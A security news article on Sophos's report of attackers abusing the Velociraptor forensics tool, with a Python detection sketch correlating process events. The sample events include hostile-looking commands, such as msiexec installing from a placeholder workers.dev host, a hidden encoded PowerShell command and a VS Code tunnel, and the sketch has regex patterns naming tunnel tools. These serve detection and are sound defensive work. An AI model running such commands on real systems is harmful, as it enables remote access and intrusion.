Hackers Abuse the Velociraptor Forensics Tool

Sophos researchers have uncovered a cyberattack in which unknown threat actors abused the open-source endpoint monitoring and forensics tool Velociraptor.

“In this incident, the attackers used the tool to download and run Visual Studio Code, likely with the intention of creating a tunnel to a command-and-control server under their control,” explained experts from the Sophos Counter Threat Unit.

Evolving Living-off-the-Land Tactics

Threat actors often rely on Living-off-the-Land (LotL) techniques, abusing legitimate tools such as remote monitoring and management (RMM) software rather than deploying custom malware. According to Sophos, the use of Velociraptor represents a troubling evolution of this tactic: incident response software itself is now being repurposed for malicious objectives.

Attack Chain

The analysis revealed that the attackers:

  1. Used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain.
  2. Deployed Velociraptor from the MSI file, which then communicated with another Cloudflare Workers domain.
  3. Leveraged this access to download Visual Studio Code via an encoded PowerShell command, running it with tunneling enabled to provide both remote access and remote code execution.
  4. Reused msiexec to fetch additional payloads, including tools such as the Cloudflare tunneling utility and the Radmin remote administration utility.
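The chain above maps onto a handful of process-creation observations that a defender can correlate per host: msiexec installing from a remote URL, a Velociraptor client starting, and then an encoded PowerShell command or a tunnel client (VS Code or cloudflared). The following detection sketch is an added example, not code from the Sophos or Rapid7 write-ups; the log line format and the sample events (hosts WS01 and WS02, the EXAMPLE.workers.dev host) are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (hypothetical; not from the Sophos report).
SAMPLE_EVENTS = [
    "host=WS01 image=msiexec.exe cmd=msiexec.exe /i https://EXAMPLE.workers.dev/agent.msi /qn",
    "host=WS01 image=velociraptor.exe cmd=velociraptor.exe --config client.config.yaml client",
    "host=WS01 image=powershell.exe cmd=powershell.exe -nop -w hidden -enc QQBBAEEA",
    "host=WS01 image=code.exe cmd=code.exe tunnel",
    "host=WS01 image=msiexec.exe cmd=msiexec.exe /i https://EXAMPLE.workers.dev/cf.msi /qn",
    "host=WS02 image=msiexec.exe cmd=msiexec.exe /i C:\\Installers\\7zip.msi /qn",
    "host=WS02 image=velociraptor.exe cmd=velociraptor.exe --config client.config.yaml client",
]

# One regex per stage of the reported chain, matched against the full command line.
STAGE_RULES = {
    "msiexec_remote_source": re.compile(r"\bmsiexec(?:\.exe)?\b.*\bhttps?://", re.I),
    "velociraptor_client_start": re.compile(r"\bvelociraptor(?:\.exe)?\b.*\bclient\b", re.I),
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    "powershell_encoded_command": re.compile(r"\bpowershell(?:\.exe)?\b.*\s-e(?:c|n|nc|ncodedcommand)?\s", re.I),
    "vscode_tunnel": re.compile(r"\bcode(?:\.exe)?\b\s+tunnel\b", re.I),
    "cloudflared_tunnel": re.compile(r"\bcloudflared(?:\.exe)?\b.*\btunnel\b", re.I),
}
POST_DEPLOY_STAGES = {"powershell_encoded_command", "vscode_tunnel", "cloudflared_tunnel"}


def parse_event(line):
    """Split a constructed 'host=... image=... cmd=...' line into (host, command line)."""
    host = re.search(r"\bhost=(\S+)", line).group(1)
    return host, line.split("cmd=", 1)[1]


def classify(cmd):
    """Return the names of every stage rule that matches this command line."""
    return [name for name, rx in STAGE_RULES.items() if rx.search(cmd)]


def find_chains(events):
    """Map host -> sorted stage names for hosts showing remote MSI install,
    a Velociraptor client start and at least one post-deployment stage."""
    per_host = defaultdict(set)
    for line in events:
        host, cmd = parse_event(line)
        per_host[host].update(classify(cmd))
    return {
        host: sorted(stages)
        for host, stages in per_host.items()
        if {"msiexec_remote_source", "velociraptor_client_start"} <= stages and stages & POST_DEPLOY_STAGES
    }


if __name__ == "__main__":
    for host, stages in find_chains(SAMPLE_EVENTS).items():
        print(f"{host}: possible Velociraptor abuse chain -> {', '.join(stages)}")
```

A single stage (a Velociraptor client starting, an msiexec install from a URL) is normal on many networks; the correlation across stages on one host is what should trigger an investigation.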

Warnings and Response

Sophos warns that organizations should carefully monitor for and investigate unauthorized use of Velociraptor, stressing that such activity could be an early stage of a ransomware deployment.

Following Sophos’s publication, Rapid7—the cybersecurity firm that develops Velociraptor—released its own guidance to help defenders detect misuse of the tool.

“Rapid7 is aware of reports warning about the abuse of the open-source incident response tool Velociraptor,” the company stated. “Velociraptor is widely used by defenders for legitimate digital forensics and incident response tasks. But, like many other security and administration tools, it can be misused if it falls into the wrong hands.”